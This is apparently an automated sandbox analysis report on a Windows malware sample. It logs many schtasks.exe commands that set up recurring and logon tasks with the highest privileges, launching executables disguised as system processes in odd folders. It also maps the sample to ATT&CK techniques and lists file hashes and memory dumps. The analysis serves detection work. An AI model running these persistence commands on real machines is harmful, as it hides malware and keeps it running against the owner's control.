schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\containerperf\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\containerperf\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\containerperf\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Windows\appcompat\encapsulation\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Windows\appcompat\encapsulation\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Google\Chrome\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Windows\Fonts\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\Fonts\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Windows\Fonts\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\it-IT\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\it-IT\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Windows\it-IT\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Windows\Offline Web Pages\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\de-DE\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\de-DE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\de-DE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\DESIGNER\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\DESIGNER\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Windows\Web\Screen\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Web\Screen\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Windows\Web\Screen\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Documents\My Pictures\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Pictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Documents\My Pictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4060

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
119B

MD5
9a9b46bb727de62735c12aaaac441bb6

SHA1
80cb2d36c03f9ea4e5dc99bf5fc37490475f81d3

SHA256
75a447cb04eb1b2274a2ef8bbc2066cc209fae5465bedb78421a963d78ccb7a4

SHA512
19c6a3f8c1478bb2ecc0b45d2c9f6a34a9ed12baac87e2f5ad334723d210ac4b63a7c6c26650fb3f20d0157a9440ed6ab437ddb3b4335c925aeecee976d1b6db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pr13odm2.irn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a183acac-d55a-4a96-a49d-a1a2d33ee001.vbs

Filesize
761B

MD5
78589bbc313b2c0a63e2e84e383f05eb

SHA1
0cbef07b347a4e01e9d192bd1cb875c63f72d238

SHA256
1637e71ccf91e4ed6e3a3c8e5a41fe9197b928337a8be1950879962f8493cde5

SHA512
e1cb7daec6c7819e8ceb5520745dac13ef6d41c6678bd9f20c90419e2398c6845f0867893ff450910d54a5b0917c9fe28b2959917207e439352877687a9e6de9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac6ml9BZWY.bat

Filesize
250B

MD5
86dcb679fb2fcb575e6466ec2a074d68

SHA1
cada3d9c0fe09d8d4f853e8d0e4415d59d6a1ee1

SHA256
5b1273b6cdd3279ee78d67d91fdc2632aa0bcb73567c7cc2be6e7bcd9854b107

SHA512
b68b53db3a14273dd02a1e0bc264b39cedff7459f8000e7cd7829a439274a9e6b31242369de6fb573a5f3e337eddfe37a9f401a8d1f5a092808d199cf43ebd20

Download Submit
C:\Users\Admin\AppData\Local\Temp\d3d03293-f0f9-493a-a353-eea5dddc2483.vbs

Filesize
537B

MD5
c17d6ec3203c2968dd4942a0175fe544

SHA1
10e567713fce046d299801602560788df3d75745

SHA256
9c8cb59739629b555aa71497747a2657701316484fdca48c1d6d4373d3e3152c

SHA512
305a4aeee8e1c2236574173cb275aa2b9aa086fb6b740e017269bbfc889caf719ad0a82bea9349184102364cb60e35fc352259d7b105a934c6b40aabecf03422

Download Submit
C:\containerperf\9nepdzd6Yg.vbe

Filesize
226B

MD5
fd73bba1ae261c1bde0a83ff425994c4

SHA1
7e9e51cef1374547c885b6e8bd62ed2a1dc6902b

SHA256
16f04c862e66dbdf8631baaa3c37e771281f59d68d60420d4dac89701c1fb732

SHA512
20644ded806f97cdd62b136fa4cd6bff7ed61d8c4f6d533dee3c71d3f12923243551e910f56d4504a0c67a89a3e50064fa8f53cb3b307150cf185c9016e004e4

Download Submit
C:\containerperf\Hyperblockport.exe

Filesize
2.9MB

MD5
a5eb91d9ffb09e43c86d3ac84354107f

SHA1
ab225fd443f3c209c4493e1dd823093c87364075

SHA256
13da0ed8f7f0cfbf7187ae5d3fe222a0aac5a0fad6e0c1f011f0ef3f8d126906

SHA512
3259e901d0347db552f658f89c11c711f328831a5da203b18e8383740a202b87aea4a2c84c33d3ca6d9a8200d1f933f8820379a7b77e094c005a004c9f3c59ee

Download Submit
C:\containerperf\MJF5L0LGrR45RopQV75MoqBbC.bat

Filesize
48B

MD5
7a122e2bf760c3ba657e5ba59337bce2

SHA1
e9ac1ad5c6b04628fdea1a0657f0e466a2a06261

SHA256
b9469f10268a8e4a44814d71f3eb6530f2a4970933b586f6dc5e3eebb2fe33f8

SHA512
89912e65857c9975e0c6ab2b3ea94f07547cba9e875b7db26dc87a6d2ec8ba79b9aa7421a78f8203587ffc70fe39df2c8fc95566c47d4681fa59f933129c6c64

Download Submit
memory/2104-84-0x000001FB46290000-0x000001FB462B2000-memory.dmp

Filesize
136KB

Download
memory/3684-216-0x000000001B340000-0x000000001B396000-memory.dmp

Filesize
344KB

Download
memory/3684-217-0x000000001BB20000-0x000000001BB32000-memory.dmp

Filesize
72KB

Download
memory/3684-227-0x000000001DB80000-0x000000001DD42000-memory.dmp

Filesize
1.8MB

Download
memory/5112-19-0x000000001B1E0000-0x000000001B236000-memory.dmp

Filesize
344KB

Download
memory/5112-24-0x000000001AFC0000-0x000000001AFD2000-memory.dmp

Filesize
72KB

Download
memory/5112-29-0x000000001BAF0000-0x000000001BAF8000-memory.dmp

Filesize
32KB

Download
memory/5112-32-0x000000001BAB0000-0x000000001BAB8000-memory.dmp

Filesize
32KB

Download
memory/5112-33-0x000000001BAC0000-0x000000001BACE000-memory.dmp

Filesize
56KB

Download
memory/5112-31-0x000000001BAA0000-0x000000001BAAE000-memory.dmp

Filesize
56KB

Download
memory/5112-30-0x000000001BA90000-0x000000001BA9A000-memory.dmp

Filesize
40KB

Download
memory/5112-34-0x000000001BAD0000-0x000000001BAD8000-memory.dmp

Filesize
32KB

Download
memory/5112-35-0x000000001BAE0000-0x000000001BAE8000-memory.dmp

Filesize
32KB

Download
memory/5112-36-0x000000001BB00000-0x000000001BB0C000-memory.dmp

Filesize
48KB

Download
memory/5112-27-0x000000001B260000-0x000000001B26C000-memory.dmp

Filesize
48KB

Download
memory/5112-26-0x000000001B250000-0x000000001B25C000-memory.dmp

Filesize
48KB

Download
memory/5112-25-0x000000001BDB0000-0x000000001C2D8000-memory.dmp

Filesize
5.2MB

Download
memory/5112-28-0x000000001B880000-0x000000001B88C000-memory.dmp

Filesize
48KB

Download
memory/5112-23-0x000000001AFB0000-0x000000001AFB8000-memory.dmp

Filesize
32KB

Download
memory/5112-22-0x000000001AFA0000-0x000000001AFAC000-memory.dmp

Filesize
48KB

Download
memory/5112-21-0x000000001AF40000-0x000000001AF48000-memory.dmp

Filesize
32KB

Download
memory/5112-20-0x000000001AF30000-0x000000001AF3C000-memory.dmp

Filesize
48KB

Download
memory/5112-18-0x000000001AF20000-0x000000001AF2A000-memory.dmp

Filesize
40KB

Download
memory/5112-17-0x0000000000D10000-0x0000000000D20000-memory.dmp

Filesize
64KB

Download
memory/5112-16-0x000000001AF00000-0x000000001AF16000-memory.dmp

Filesize
88KB

Download
memory/5112-15-0x000000001AF50000-0x000000001AFA0000-memory.dmp

Filesize
320KB

Download
memory/5112-14-0x0000000000CF0000-0x0000000000D0C000-memory.dmp

Filesize
112KB

Download
memory/5112-13-0x00000000001F0000-0x00000000004D2000-memory.dmp

Filesize
2.9MB

Download
memory/5112-12-0x00007FFCF7D63000-0x00007FFCF7D65000-memory.dmp

Filesize
8KB

Download